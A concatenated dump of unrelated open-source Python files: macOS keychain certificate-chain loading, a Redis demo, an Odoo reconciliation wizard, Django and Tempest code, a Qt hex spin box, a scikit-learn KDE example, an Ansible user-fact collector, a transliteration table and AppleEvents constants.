# and then free the array. We don't need to keep hold of keys: the
# keychain already has them!
result_count = CoreFoundation.CFArrayGetCount(result_array)
for index in range(result_count):
item = CoreFoundation.CFArrayGetValueAtIndex(
result_array, index
)
item = ctypes.cast(item, CoreFoundation.CFTypeRef)
if _is_cert(item):
CoreFoundation.CFRetain(item)
certificates.append(item)
elif _is_identity(item):
CoreFoundation.CFRetain(item)
identities.append(item)
finally:
if result_array:
CoreFoundation.CFRelease(result_array)
CoreFoundation.CFRelease(filedata)
return (identities, certificates)
def _load_client_cert_chain(keychain, *paths):
"""
Load certificates and maybe keys from a number of files. Has the end goal
of returning a CFArray containing one SecIdentityRef, and then zero or more
SecCertificateRef objects, suitable for use as a client certificate trust
chain.
"""
# Ok, the strategy.
#
# This relies on knowing that macOS will not give you a SecIdentityRef
# unless you have imported a key into a keychain. This is a somewhat
# artificial limitation of macOS (for example, it doesn't necessarily
# affect iOS), but there is nothing inside Security.framework that lets you
# get a SecIdentityRef without having a key in a keychain.
#
# So the policy here is we take all the files and iterate them in order.
# Each one will use SecItemImport to have one or more objects loaded from
# it. We will also point at a keychain that macOS can use to work with the
# private key.
#
# Once we have all the objects, we'll check what we actually have. If we
# already have a SecIdentityRef in hand, fab: we'll use that. Otherwise,
# we'll take the first certificate (which we assume to be our leaf) and
# ask the keychain to give us a SecIdentityRef with that cert's associated
# key.
#
# We'll then return a CFArray containing the trust chain: one
# SecIdentityRef and then zero-or-more SecCertificateRef objects. The
# responsibility for freeing this CFArray will be with the caller. This
# CFArray must remain alive for the entire connection, so in practice it
# will be stored with a single SSLSocket, along with the reference to the
# keychain.
certificates = []
identities = []
# Filter out bad paths.
paths = (path for path in paths if path)
try:
for file_path in paths:
new_identities, new_certs = _load_items_from_file(
keychain, file_path
)
identities.extend(new_identities)
certificates.extend(new_certs)
# Ok, we have everything. The question is: do we have an identity? If
# not, we want to grab one from the first cert we have.
if not identities:
new_identity = Security.SecIdentityRef()
status = Security.SecIdentityCreateWithCertificate(
keychain,
certificates[0],
ctypes.byref(new_identity)
)
_assert_no_error(status)
identities.append(new_identity)
# We now want to release the original certificate, as we no longer
# need it.
CoreFoundation.CFRelease(certificates.pop(0))
# We now need to build a new CFArray that holds the trust chain.
trust_chain = CoreFoundation.CFArrayCreateMutable(
CoreFoundation.kCFAllocatorDefault,
0,
ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks),
)
for item in itertools.chain(identities, certificates):
# ArrayAppendValue does a CFRetain on the item. That's fine,
# because the finally block will release our other refs to them.
CoreFoundation.CFArrayAppendValue(trust_chain, item)
return trust_chain
finally:
for obj in itertools.chain(identities, certificates):
CoreFoundation.CFRelease(obj)
|
luoxufeiyan/python | refs/heads/master | NKUCodingCat/0003/0003.py | 40 | #coding=utf-8
#并没有redis所以我只是抄官网的示例代码
import os,re,redis
path = os.path.split(os.path.realpath(__file__))[0]+"/"
f = open(path+"code.txt","r")
A = f.read()
arr = re.split("\s+",A)
r = redis.Redis(host='localhost', port=6379, db=0)
for i in range(len(arr)):
if i:
r.set(str(i),arr[i])
r.save() |
fuselock/odoo | refs/heads/8.0 | addons/account/wizard/account_reconcile_partner_process.py | 385 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_partner_reconcile_process(osv.osv_memory):
_name = 'account.partner.reconcile.process'
_description = 'Reconcilation Process partner by partner'
def _get_to_reconcile(self, cr, uid, context=None):
cr.execute("""
SELECT p_id FROM (SELECT l.partner_id as p_id, SUM(l.debit) AS debit, SUM(l.credit) AS credit
FROM account_move_line AS l LEFT JOIN account_account a ON (l.account_id = a.id)
LEFT JOIN res_partner p ON (p.id = l.partner_id)
WHERE a.reconcile = 't'
AND l.reconcile_id IS NULL
AND (%s > to_char(p.last_reconciliation_date, 'YYYY-MM-DD') OR p.last_reconciliation_date IS NULL )
AND l.state <> 'draft'
GROUP BY l.partner_id) AS tmp
WHERE debit > 0
AND credit > 0
""",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) - 1
def _get_today_reconciled(self, cr, uid, context=None):
cr.execute(
"SELECT l.partner_id " \
"FROM account_move_line AS l LEFT JOIN res_partner p ON (p.id = l.partner_id) " \
"WHERE l.reconcile_id IS NULL " \
"AND %s = to_char(p.last_reconciliation_date, 'YYYY-MM-DD') " \
"AND l.state <> 'draft' " \
"GROUP BY l.partner_id ",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) + 1
def _get_partner(self, cr, uid, context=None):
move_line_obj = self.pool.get('account.move.line')
partner = move_line_obj.list_partners_to_reconcile(cr, uid, context=context)
if not partner:
return False
return partner[0][0]
def data_get(self, cr, uid, to_reconcile, today_reconciled, context=None):
return {'progress': (100 / (float(to_reconcile + today_reconciled) or 1.0)) * today_reconciled}
def default_get(self, cr, uid, fields, context=None):
res = super(account_partner_reconcile_process, self).default_get(cr, uid, fields, context=context)
if 'to_reconcile' in res and 'today_reconciled' in res:
data = self.data_get(cr, uid, res['to_reconcile'], res['today_reconciled'], context)
res.update(data)
return res
def next_partner(self, cr, uid, ids, context=None):
if context is None:
context = {}
move_line_obj = self.pool.get('account.move.line')
res_partner_obj = self.pool.get('res.partner')
partner_id = move_line_obj.read(cr, uid, context['active_id'], ['partner_id'])['partner_id']
if partner_id:
res_partner_obj.write(cr, uid, partner_id[0], {'last_reconciliation_date': time.strftime('%Y-%m-%d')}, context)
#TODO: we have to find a way to update the context of the current tab (we could open a new tab with the context but it's not really handy)
#TODO: remove that comments when the client side dev is done
return {'type': 'ir.actions.act_window_close'}
_columns = {
'to_reconcile': fields.float('Remaining Partners', readonly=True, help='This is the remaining partners for who you should check if there is something to reconcile or not. This figure already count the current partner as reconciled.'),
'today_reconciled': fields.float('Partners Reconciled Today', readonly=True, help='This figure depicts the total number of partners that have gone throught the reconciliation process today. The current partner is counted as already processed.'),
'progress': fields.float('Progress', readonly=True, help='Shows you the progress made today on the reconciliation process. Given by \nPartners Reconciled Today \ (Remaining Partners + Partners Reconciled Today)'),
'next_partner_id': fields.many2one('res.partner', 'Next Partner to Reconcile', readonly=True, help='This field shows you the next partner that will be automatically chosen by the system to go through the reconciliation process, based on the latest day it have been reconciled.'), # TODO: remove the readonly=True when teh client side will allow to update the context of existing tab, so that the user can change this value if he doesn't want to follow openerp proposal
}
_defaults = {
'to_reconcile': _get_to_reconcile,
'today_reconciled': _get_today_reconciled,
'next_partner_id': _get_partner,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
MFoster/breeze | refs/heads/master | django/core/management/commands/sqlall.py | 237 | from __future__ import unicode_literals
from optparse import make_option
from django.core.management.base import AppCommand
from django.core.management.sql import sql_all
from django.db import connections, DEFAULT_DB_ALIAS
class Command(AppCommand):
help = "Prints the CREATE TABLE, custom SQL and CREATE INDEX SQL statements for the given model module name(s)."
option_list = AppCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to print the '
'SQL for. Defaults to the "default" database.'),
)
output_transaction = True
def handle_app(self, app, **options):
return '\n'.join(sql_all(app, self.style, connections[options.get('database')]))
|
HybridF5/tempest_debug | refs/heads/master | tempest/tests/lib/services/compute/test_services_client.py | 6 | # Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib.services.compute import services_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestServicesClient(base.BaseComputeServiceTest):
FAKE_SERVICES = {
"services":
[{
"status": "enabled",
"binary": "nova-conductor",
"zone": "internal",
"state": "up",
"updated_at": "2015-08-19T06:50:55.000000",
"host": "controller",
"disabled_reason": None,
"id": 1
}]
}
FAKE_SERVICE = {
"service":
{
"status": "enabled",
"binary": "nova-conductor",
"host": "controller"
}
}
def setUp(self):
super(TestServicesClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = services_client.ServicesClient(
fake_auth, 'compute', 'regionOne')
def test_list_services_with_str_body(self):
self.check_service_client_function(
self.client.list_services,
'tempest.lib.common.rest_client.RestClient.get',
self.FAKE_SERVICES)
def test_list_services_with_bytes_body(self):
self.check_service_client_function(
self.client.list_services,
'tempest.lib.common.rest_client.RestClient.get',
self.FAKE_SERVICES, to_utf=True)
def _test_enable_service(self, bytes_body=False):
self.check_service_client_function(
self.client.enable_service,
'tempest.lib.common.rest_client.RestClient.put',
self.FAKE_SERVICE,
bytes_body,
host_name="nova-conductor", binary="controller")
def test_enable_service_with_str_body(self):
self._test_enable_service()
def test_enable_service_with_bytes_body(self):
self._test_enable_service(bytes_body=True)
def _test_disable_service(self, bytes_body=False):
fake_service = copy.deepcopy(self.FAKE_SERVICE)
fake_service["service"]["status"] = "disable"
self.check_service_client_function(
self.client.disable_service,
'tempest.lib.common.rest_client.RestClient.put',
fake_service,
bytes_body,
host_name="nova-conductor", binary="controller")
def test_disable_service_with_str_body(self):
self._test_disable_service()
def test_disable_service_with_bytes_body(self):
self._test_disable_service(bytes_body=True)
|
udrg/crazyflie-clients-python | refs/heads/develop | lib/cfclient/ui/widgets/hexspinbox.py | 7 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# || ____ _ __
# +------+ / __ )(_) /_______________ _____ ___
# | 0xBC | / __ / / __/ ___/ ___/ __ `/_ / / _ \
# +------+ / /_/ / / /_/ /__/ / / /_/ / / /_/ __/
# || || /_____/_/\__/\___/_/ \__,_/ /___/\___/
#
# Copyright (C) 2011-2013 Bitcraze AB
#
# Crazyflie Nano Quadcopter Client
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
This class provides a spin box with hexadecimal numbers and arbitrarily length (i.e. not limited by 32 bit).
"""
__author__ = 'Bitcraze AB'
__all__ = ['HexSpinBox']
from PyQt4 import QtGui, QtCore
from PyQt4.QtGui import QAbstractSpinBox
class HexSpinBox(QAbstractSpinBox):
def __init__(self, *args):
QAbstractSpinBox.__init__(self, *args)
regexp = QtCore.QRegExp('^0x[0-9A-Fa-f]{1,10}$')
self.validator = QtGui.QRegExpValidator(regexp)
self._value = 0
def validate(self, text, pos):
return self.validator.validate(text, pos)
def textFromValue(self, value):
return "0x%X" % value
def valueFromText(self, text):
return int(str(text), 0)
def setValue(self, value):
self._value = value
self.lineEdit().setText(self.textFromValue(value))
def value(self):
self._value = self.valueFromText(self.lineEdit().text())
return self._value
def stepBy(self, steps):
self.setValue(self._value + steps)
def stepEnabled(self):
return QAbstractSpinBox.StepUpEnabled | QAbstractSpinBox.StepDownEnabled
|
mayblue9/scikit-learn | refs/heads/master | examples/neighbors/plot_digits_kde_sampling.py | 251 | """
=========================
Kernel Density Estimation
=========================
This example shows how kernel density estimation (KDE), a powerful
non-parametric density estimation technique, can be used to learn
a generative model for a dataset. With this generative model in place,
new samples can be drawn. These new samples reflect the underlying model
of the data.
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_digits
from sklearn.neighbors import KernelDensity
from sklearn.decomposition import PCA
from sklearn.grid_search import GridSearchCV
# load the data
digits = load_digits()
data = digits.data
# project the 64-dimensional data to a lower dimension
pca = PCA(n_components=15, whiten=False)
data = pca.fit_transform(digits.data)
# use grid search cross-validation to optimize the bandwidth
params = {'bandwidth': np.logspace(-1, 1, 20)}
grid = GridSearchCV(KernelDensity(), params)
grid.fit(data)
print("best bandwidth: {0}".format(grid.best_estimator_.bandwidth))
# use the best estimator to compute the kernel density estimate
kde = grid.best_estimator_
# sample 44 new points from the data
new_data = kde.sample(44, random_state=0)
new_data = pca.inverse_transform(new_data)
# turn data into a 4x11 grid
new_data = new_data.reshape((4, 11, -1))
real_data = digits.data[:44].reshape((4, 11, -1))
# plot real digits and resampled digits
fig, ax = plt.subplots(9, 11, subplot_kw=dict(xticks=[], yticks=[]))
for j in range(11):
ax[4, j].set_visible(False)
for i in range(4):
im = ax[i, j].imshow(real_data[i, j].reshape((8, 8)),
cmap=plt.cm.binary, interpolation='nearest')
im.set_clim(0, 16)
im = ax[i + 5, j].imshow(new_data[i, j].reshape((8, 8)),
cmap=plt.cm.binary, interpolation='nearest')
im.set_clim(0, 16)
ax[0, 5].set_title('Selection from the input data')
ax[5, 5].set_title('"New" digits drawn from the kernel density model')
plt.show()
|
ravibhure/ansible | refs/heads/devel | lib/ansible/module_utils/facts/system/user.py | 211 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import getpass
import os
import pwd
from ansible.module_utils.facts.collector import BaseFactCollector
class UserFactCollector(BaseFactCollector):
name = 'user'
_fact_ids = set(['user_id', 'user_uid', 'user_gid',
'user_gecos', 'user_dir', 'user_shell',
'real_user_id', 'effective_user_id',
'effective_group_ids'])
def collect(self, module=None, collected_facts=None):
user_facts = {}
user_facts['user_id'] = getpass.getuser()
pwent = pwd.getpwnam(getpass.getuser())
user_facts['user_uid'] = pwent.pw_uid
user_facts['user_gid'] = pwent.pw_gid
user_facts['user_gecos'] = pwent.pw_gecos
user_facts['user_dir'] = pwent.pw_dir
user_facts['user_shell'] = pwent.pw_shell
user_facts['real_user_id'] = os.getuid()
user_facts['effective_user_id'] = os.geteuid()
user_facts['real_group_id'] = os.getgid()
user_facts['effective_group_id'] = os.getgid()
return user_facts
|
yvan-sraka/wprevents | refs/heads/master | vendor-local/lib/python/unidecode/x089.py | 252 | data = (
'Ji ', # 0x00
'Zhi ', # 0x01
'Gua ', # 0x02
'Ken ', # 0x03
'Che ', # 0x04
'Ti ', # 0x05
'Ti ', # 0x06
'Fu ', # 0x07
'Chong ', # 0x08
'Xie ', # 0x09
'Bian ', # 0x0a
'Die ', # 0x0b
'Kun ', # 0x0c
'Duan ', # 0x0d
'Xiu ', # 0x0e
'Xiu ', # 0x0f
'He ', # 0x10
'Yuan ', # 0x11
'Bao ', # 0x12
'Bao ', # 0x13
'Fu ', # 0x14
'Yu ', # 0x15
'Tuan ', # 0x16
'Yan ', # 0x17
'Hui ', # 0x18
'Bei ', # 0x19
'Chu ', # 0x1a
'Lu ', # 0x1b
'Ena ', # 0x1c
'Hitoe ', # 0x1d
'Yun ', # 0x1e
'Da ', # 0x1f
'Gou ', # 0x20
'Da ', # 0x21
'Huai ', # 0x22
'Rong ', # 0x23
'Yuan ', # 0x24
'Ru ', # 0x25
'Nai ', # 0x26
'Jiong ', # 0x27
'Suo ', # 0x28
'Ban ', # 0x29
'Tun ', # 0x2a
'Chi ', # 0x2b
'Sang ', # 0x2c
'Niao ', # 0x2d
'Ying ', # 0x2e
'Jie ', # 0x2f
'Qian ', # 0x30
'Huai ', # 0x31
'Ku ', # 0x32
'Lian ', # 0x33
'Bao ', # 0x34
'Li ', # 0x35
'Zhe ', # 0x36
'Shi ', # 0x37
'Lu ', # 0x38
'Yi ', # 0x39
'Die ', # 0x3a
'Xie ', # 0x3b
'Xian ', # 0x3c
'Wei ', # 0x3d
'Biao ', # 0x3e
'Cao ', # 0x3f
'Ji ', # 0x40
'Jiang ', # 0x41
'Sen ', # 0x42
'Bao ', # 0x43
'Xiang ', # 0x44
'Chihaya ', # 0x45
'Pu ', # 0x46
'Jian ', # 0x47
'Zhuan ', # 0x48
'Jian ', # 0x49
'Zui ', # 0x4a
'Ji ', # 0x4b
'Dan ', # 0x4c
'Za ', # 0x4d
'Fan ', # 0x4e
'Bo ', # 0x4f
'Xiang ', # 0x50
'Xin ', # 0x51
'Bie ', # 0x52
'Rao ', # 0x53
'Man ', # 0x54
'Lan ', # 0x55
'Ao ', # 0x56
'Duo ', # 0x57
'Gui ', # 0x58
'Cao ', # 0x59
'Sui ', # 0x5a
'Nong ', # 0x5b
'Chan ', # 0x5c
'Lian ', # 0x5d
'Bi ', # 0x5e
'Jin ', # 0x5f
'Dang ', # 0x60
'Shu ', # 0x61
'Tan ', # 0x62
'Bi ', # 0x63
'Lan ', # 0x64
'Pu ', # 0x65
'Ru ', # 0x66
'Zhi ', # 0x67
'[?] ', # 0x68
'Shu ', # 0x69
'Wa ', # 0x6a
'Shi ', # 0x6b
'Bai ', # 0x6c
'Xie ', # 0x6d
'Bo ', # 0x6e
'Chen ', # 0x6f
'Lai ', # 0x70
'Long ', # 0x71
'Xi ', # 0x72
'Xian ', # 0x73
'Lan ', # 0x74
'Zhe ', # 0x75
'Dai ', # 0x76
'Tasuki ', # 0x77
'Zan ', # 0x78
'Shi ', # 0x79
'Jian ', # 0x7a
'Pan ', # 0x7b
'Yi ', # 0x7c
'Ran ', # 0x7d
'Ya ', # 0x7e
'Xi ', # 0x7f
'Xi ', # 0x80
'Yao ', # 0x81
'Feng ', # 0x82
'Tan ', # 0x83
'[?] ', # 0x84
'Biao ', # 0x85
'Fu ', # 0x86
'Ba ', # 0x87
'He ', # 0x88
'Ji ', # 0x89
'Ji ', # 0x8a
'Jian ', # 0x8b
'Guan ', # 0x8c
'Bian ', # 0x8d
'Yan ', # 0x8e
'Gui ', # 0x8f
'Jue ', # 0x90
'Pian ', # 0x91
'Mao ', # 0x92
'Mi ', # 0x93
'Mi ', # 0x94
'Mie ', # 0x95
'Shi ', # 0x96
'Si ', # 0x97
'Zhan ', # 0x98
'Luo ', # 0x99
'Jue ', # 0x9a
'Mi ', # 0x9b
'Tiao ', # 0x9c
'Lian ', # 0x9d
'Yao ', # 0x9e
'Zhi ', # 0x9f
'Jun ', # 0xa0
'Xi ', # 0xa1
'Shan ', # 0xa2
'Wei ', # 0xa3
'Xi ', # 0xa4
'Tian ', # 0xa5
'Yu ', # 0xa6
'Lan ', # 0xa7
'E ', # 0xa8
'Du ', # 0xa9
'Qin ', # 0xaa
'Pang ', # 0xab
'Ji ', # 0xac
'Ming ', # 0xad
'Ying ', # 0xae
'Gou ', # 0xaf
'Qu ', # 0xb0
'Zhan ', # 0xb1
'Jin ', # 0xb2
'Guan ', # 0xb3
'Deng ', # 0xb4
'Jian ', # 0xb5
'Luo ', # 0xb6
'Qu ', # 0xb7
'Jian ', # 0xb8
'Wei ', # 0xb9
'Jue ', # 0xba
'Qu ', # 0xbb
'Luo ', # 0xbc
'Lan ', # 0xbd
'Shen ', # 0xbe
'Di ', # 0xbf
'Guan ', # 0xc0
'Jian ', # 0xc1
'Guan ', # 0xc2
'Yan ', # 0xc3
'Gui ', # 0xc4
'Mi ', # 0xc5
'Shi ', # 0xc6
'Zhan ', # 0xc7
'Lan ', # 0xc8
'Jue ', # 0xc9
'Ji ', # 0xca
'Xi ', # 0xcb
'Di ', # 0xcc
'Tian ', # 0xcd
'Yu ', # 0xce
'Gou ', # 0xcf
'Jin ', # 0xd0
'Qu ', # 0xd1
'Jiao ', # 0xd2
'Jiu ', # 0xd3
'Jin ', # 0xd4
'Cu ', # 0xd5
'Jue ', # 0xd6
'Zhi ', # 0xd7
'Chao ', # 0xd8
'Ji ', # 0xd9
'Gu ', # 0xda
'Dan ', # 0xdb
'Zui ', # 0xdc
'Di ', # 0xdd
'Shang ', # 0xde
'Hua ', # 0xdf
'Quan ', # 0xe0
'Ge ', # 0xe1
'Chi ', # 0xe2
'Jie ', # 0xe3
'Gui ', # 0xe4
'Gong ', # 0xe5
'Hong ', # 0xe6
'Jie ', # 0xe7
'Hun ', # 0xe8
'Qiu ', # 0xe9
'Xing ', # 0xea
'Su ', # 0xeb
'Ni ', # 0xec
'Ji ', # 0xed
'Lu ', # 0xee
'Zhi ', # 0xef
'Zha ', # 0xf0
'Bi ', # 0xf1
'Xing ', # 0xf2
'Hu ', # 0xf3
'Shang ', # 0xf4
'Gong ', # 0xf5
'Zhi ', # 0xf6
'Xue ', # 0xf7
'Chu ', # 0xf8
'Xi ', # 0xf9
'Yi ', # 0xfa
'Lu ', # 0xfb
'Jue ', # 0xfc
'Xi ', # 0xfd
'Yan ', # 0xfe
'Xi ', # 0xff
)
|
tinkerinestudio/Tinkerine-Suite | refs/heads/master | TinkerineSuite/pypy/lib-python/2.7/plat-mac/Carbon/AppleEvents.py | 73 | # Generated from 'AEDataModel.h'
def FOUR_CHAR_CODE(x): return x
typeApplicationBundleID = FOUR_CHAR_CODE('bund')
typeBoolean = FOUR_CHAR_CODE('bool')
typeChar = FOUR_CHAR_CODE('TEXT')
typeSInt16 = FOUR_CHAR_CODE('shor')
typeSInt32 = FOUR_CHAR_CODE('long')
typeUInt32 = FOUR_CHAR_CODE('magn')
typeSInt64 = FOUR_CHAR_CODE('comp')
typeIEEE32BitFloatingPoint = FOUR_CHAR_CODE('sing')
typeIEEE64BitFloatingPoint = FOUR_CHAR_CODE('doub')
type128BitFloatingPoint = FOUR_CHAR_CODE('ldbl')
typeDecimalStruct = FOUR_CHAR_CODE('decm')
typeSMInt = typeSInt16
typeShortInteger = typeSInt16
typeInteger = typeSInt32
typeLongInteger = typeSInt32
typeMagnitude = typeUInt32
typeComp = typeSInt64
typeSMFloat = typeIEEE32BitFloatingPoint
typeShortFloat = typeIEEE32BitFloatingPoint
typeFloat = typeIEEE64BitFloatingPoint
typeLongFloat = typeIEEE64BitFloatingPoint
typeExtended = FOUR_CHAR_CODE('exte')
typeAEList = FOUR_CHAR_CODE('list')
typeAERecord = FOUR_CHAR_CODE('reco')
typeAppleEvent = FOUR_CHAR_CODE('aevt')
typeEventRecord = FOUR_CHAR_CODE('evrc')
typeTrue = FOUR_CHAR_CODE('true')
typeFalse = FOUR_CHAR_CODE('fals')
typeAlias = FOUR_CHAR_CODE('alis')
typeEnumerated = FOUR_CHAR_CODE('enum')
typeType = FOUR_CHAR_CODE('type')
typeAppParameters = FOUR_CHAR_CODE('appa')
typeProperty = FOUR_CHAR_CODE('prop')
typeFSS = FOUR_CHAR_CODE('fss ')
typeFSRef = FOUR_CHAR_CODE('fsrf')
typeFileURL = FOUR_CHAR_CODE('furl')
typeKeyword = FOUR_CHAR_CODE('keyw')
typeSectionH = FOUR_CHAR_CODE('sect')
typeWildCard = FOUR_CHAR_CODE('****')
typeApplSignature = FOUR_CHAR_CODE('sign')
typeQDRectangle = FOUR_CHAR_CODE('qdrt')
typeFixed = FOUR_CHAR_CODE('fixd')
typeProcessSerialNumber = FOUR_CHAR_CODE('psn ')
typeApplicationURL = FOUR_CHAR_CODE('aprl')
typeNull = FOUR_CHAR_CODE('null')
typeSessionID = FOUR_CHAR_CODE('ssid')
typeTargetID = FOUR_CHAR_CODE('targ')
typeDispatcherID = FOUR_CHAR_CODE('dspt')
keyTransactionIDAttr = FOUR_CHAR_CODE('tran')
keyReturnIDAttr = FOUR_CHAR_CODE('rtid')
keyEventClassAttr = FOUR_CHAR_CODE('evcl')
keyEventIDAttr = FOUR_CHAR_CODE('evid')
keyAddressAttr = FOUR_CHAR_CODE('addr')
keyOptionalKeywordAttr = FOUR_CHAR_CODE('optk')
keyTimeoutAttr = FOUR_CHAR_CODE('timo')
keyInteractLevelAttr = FOUR_CHAR_CODE('inte')
keyEventSourceAttr = FOUR_CHAR_CODE('esrc')
keyMissedKeywordAttr = FOUR_CHAR_CODE('miss')
keyOriginalAddressAttr = FOUR_CHAR_CODE('from')
keyAcceptTimeoutAttr = FOUR_CHAR_CODE('actm')
kAEDescListFactorNone = 0
kAEDescListFactorType = 4
kAEDescListFactorTypeAndSize = 8
kAutoGenerateReturnID = -1
kAnyTransactionID = 0
kAEDataArray = 0
kAEPackedArray = 1
kAEDescArray = 3
kAEKeyDescArray = 4
kAEHandleArray = 2
kAENormalPriority = 0x00000000
kAEHighPriority = 0x00000001
kAENoReply = 0x00000001
kAEQueueReply = 0x00000002
kAEWaitReply = 0x00000003
kAEDontReconnect = 0x00000080
kAEWantReceipt = 0x00000200
kAENeverInteract = 0x00000010
kAECanInteract = 0x00000020
kAEAlwaysInteract = 0x00000030
kAECanSwitchLayer = 0x00000040
kAEDontRecord = 0x00001000
kAEDontExecute = 0x00002000
kAEProcessNonReplyEvents = 0x00008000
kAEDefaultTimeout = -1
kNoTimeOut = -2
kAEInteractWithSelf = 0
kAEInteractWithLocal = 1
kAEInteractWithAll = 2
kAEDoNotIgnoreHandler = 0x00000000
kAEIgnoreAppPhacHandler = 0x00000001
kAEIgnoreAppEventHandler = 0x00000002
kAEIgnoreSysPhacHandler = 0x00000004
kAEIgnoreSysEventHandler = 0x00000008
kAEIngoreBuiltInEventHandler = 0x00000010
# kAEDontDisposeOnResume = (long)0x80000000
kAENoDispatch = 0
# kAEUseStandardDispatch = (long)0xFFFFFFFF
keyDirectObject = FOUR_CHAR_CODE('----')
keyErrorNumber = FOUR_CHAR_CODE('errn')
keyErrorString = FOUR_CHAR_CODE('errs')
keyProcessSerialNumber = FOUR_CHAR_CODE('psn ')
keyPreDispatch = FOUR_CHAR_CODE('phac')
keySelectProc = FOUR_CHAR_CODE('selh')
keyAERecorderCount = FOUR_CHAR_CODE('recr')
keyAEVersion = FOUR_CHAR_CODE('vers')
kCoreEventClass = FOUR_CHAR_CODE('aevt')
kAEOpenApplication = FOUR_CHAR_CODE('oapp')
kAEOpenDocuments = FOUR_CHAR_CODE('odoc')
kAEPrintDocuments = FOUR_CHAR_CODE('pdoc')
kAEQuitApplication = FOUR_CHAR_CODE('quit')
kAEAnswer = FOUR_CHAR_CODE('ansr')
kAEApplicationDied = FOUR_CHAR_CODE('obit')
kAEShowPreferences = FOUR_CHAR_CODE('pref')
kAEStartRecording = FOUR_CHAR_CODE('reca')
kAEStopRecording = FOUR_CHAR_CODE('recc')
kAENotifyStartRecording = FOUR_CHAR_CODE('rec1')
kAENotifyStopRecording = FOUR_CHAR_CODE('rec0')
kAENotifyRecording = FOUR_CHAR_CODE('recr')
kAEUnknownSource = 0
kAEDirectCall = 1
kAESameProcess = 2
kAELocalProcess = 3
kAERemoteProcess = 4
cAEList = FOUR_CHAR_CODE('list')
cApplication = FOUR_CHAR_CODE('capp')
cArc = FOUR_CHAR_CODE('carc')
cBoolean = FOUR_CHAR_CODE('bool')
cCell = FOUR_CHAR_CODE('ccel')
cChar = FOUR_CHAR_CODE('cha ')
cColorTable = FOUR_CHAR_CODE('clrt')
cColumn = FOUR_CHAR_CODE('ccol')
cDocument = FOUR_CHAR_CODE('docu')
cDrawingArea = FOUR_CHAR_CODE('cdrw')
cEnumeration = FOUR_CHAR_CODE('enum')
cFile = FOUR_CHAR_CODE('file')
cFixed = FOUR_CHAR_CODE('fixd')
cFixedPoint = FOUR_CHAR_CODE('fpnt')
cFixedRectangle = FOUR_CHAR_CODE('frct')
cGraphicLine = FOUR_CHAR_CODE('glin')
cGraphicObject = FOUR_CHAR_CODE('cgob')
cGraphicShape = FOUR_CHAR_CODE('cgsh')
cGraphicText = FOUR_CHAR_CODE('cgtx')
cGroupedGraphic = FOUR_CHAR_CODE('cpic')
cInsertionLoc = FOUR_CHAR_CODE('insl')
cInsertionPoint = FOUR_CHAR_CODE('cins')
cIntlText = FOUR_CHAR_CODE('itxt')
cIntlWritingCode = FOUR_CHAR_CODE('intl')
cItem = FOUR_CHAR_CODE('citm')
cLine = FOUR_CHAR_CODE('clin')
cLongDateTime = FOUR_CHAR_CODE('ldt ')
cLongFixed = FOUR_CHAR_CODE('lfxd')
cLongFixedPoint = FOUR_CHAR_CODE('lfpt')
cLongFixedRectangle = FOUR_CHAR_CODE('lfrc')
cLongInteger = FOUR_CHAR_CODE('long')
cLongPoint = FOUR_CHAR_CODE('lpnt')
cLongRectangle = FOUR_CHAR_CODE('lrct')
cMachineLoc = FOUR_CHAR_CODE('mLoc')
cMenu = FOUR_CHAR_CODE('cmnu')
cMenuItem = FOUR_CHAR_CODE('cmen')
cObject = FOUR_CHAR_CODE('cobj')
cObjectSpecifier = FOUR_CHAR_CODE('obj ')
cOpenableObject = FOUR_CHAR_CODE('coob')
cOval = FOUR_CHAR_CODE('covl')
cParagraph = FOUR_CHAR_CODE('cpar')
cPICT = FOUR_CHAR_CODE('PICT')
cPixel = FOUR_CHAR_CODE('cpxl')
cPixelMap = FOUR_CHAR_CODE('cpix')
cPolygon = FOUR_CHAR_CODE('cpgn')
